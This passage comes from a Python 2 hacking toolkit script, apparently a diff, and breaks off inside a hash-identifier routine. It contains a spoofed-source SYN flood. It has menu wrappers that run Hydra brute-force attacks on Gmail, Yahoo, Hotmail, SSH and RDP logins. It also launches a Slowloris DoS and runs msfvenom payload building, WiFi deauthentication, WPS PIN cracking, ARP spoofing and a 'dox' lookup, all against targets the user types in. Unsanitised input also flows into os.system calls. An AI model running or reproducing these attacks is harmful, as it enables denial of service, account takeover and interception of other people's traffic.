IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + 